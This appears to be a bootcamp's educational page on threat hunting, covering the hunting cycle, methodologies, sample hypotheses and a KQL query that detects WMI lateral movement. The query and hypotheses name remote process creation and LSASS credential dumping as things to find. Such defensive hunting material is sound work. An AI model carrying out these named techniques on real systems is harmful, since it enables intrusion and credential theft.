Why It Matters
Detection technologies, no matter how advanced, cannot catch every attack. Sophisticated adversaries blend in with normal user activity, abuse legitimate tools (living-off-the-land), and operate slowly enough to avoid alert thresholds. The IBM Cost of a Data Breach Report consistently shows median dwell time, the gap between intrusion and detection, exceeds 200 days for organizations without active hunting programs.
Threat hunting changes the calculus. Rather than waiting for an alert, hunters assume compromise and search the environment for evidence of adversaries. Mature programs like those at Microsoft, Google, and major banks document hundreds of detections that originated from human-led hunts.
The Hunting Cycle
1. Develop a Hypothesis
A good hypothesis is specific and testable, often derived from threat intelligence, recent incidents, or MITRE ATT&CK techniques relevant to the organization. Example: "An attacker is using WMI for lateral movement (T1047) in our finance subnet."
2. Investigate with Data
Pull relevant telemetry from EDR, identity systems, network sensors, and cloud logs. Apply analytics like frequency analysis, stack counting, outlier detection, and timeline reconstruction.
// KQL hunt for suspicious WMI activity
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has_any ("wmic", "Invoke-WmiMethod")
| where ProcessCommandLine has_any ("process call create", "/node:")
| summarize Count=count(), Devices=dcount(DeviceName) by InitiatingProcessAccountName
| where Devices >= 3
| order by Count desc3. Discover and Document
Whether the hypothesis is confirmed, refuted, or inconclusive, document what you learned, including queries, data sources, and gaps in visibility.
4. Engineer Detections
Convert successful hunts into automated detections (Sigma rules, EDR custom IOCs, SIEM correlations) so the SOC catches the same behavior automatically next time.
5. Hand-off and Improve
Confirmed compromises move to incident response. Telemetry gaps drive logging improvements. The cycle repeats with new hypotheses.
Hunting Methodologies
| Approach | Description | When to Use |
|---|---|---|
| Hypothesis-driven | Test specific TTP-based hypotheses | Routine, mature programs |
| Intelligence-driven | Hunt for IOCs from threat reports | After targeted threat advisories |
| Anomaly-based | Search for statistical outliers | Limited threat intel |
| Crown jewels | Focus on critical assets | Constrained resources |
| Hybrid | Combination of approaches | Most real programs |
The Pyramid of Pain
Common Hunting Hypotheses
- Suspicious LSASS access (credential dumping, T1003)
- Unsigned binaries running from temp directories
- Anomalous PowerShell with encoded commands
- Unusual parent-child process relationships
- DNS beaconing patterns
- Unexpected service account interactive logins
- New scheduled tasks created with elevated privileges
Building a Hunt Program
- Establish baselines of normal activity in your environment.
- Adopt MITRE ATT&CK as your common language and prioritization tool.
- Centralize telemetry in a SIEM or data lake with sufficient retention (90+ days).
- Schedule regular hunts with documented hypotheses and findings.
- Measure outputs: new detections shipped, mean dwell time reduction, gaps closed.
Related Concepts
How We Teach Threat Hunting
In our Cybersecurity Bootcamp, you won't just learn about Threat Hunting in theory. You'll practice with real tools in hands-on labs, guided by industry professionals who use these concepts daily.
Covered in:
Module 8: Advanced Security Operations
360+ hours of expert-led training • CompTIA Security+ included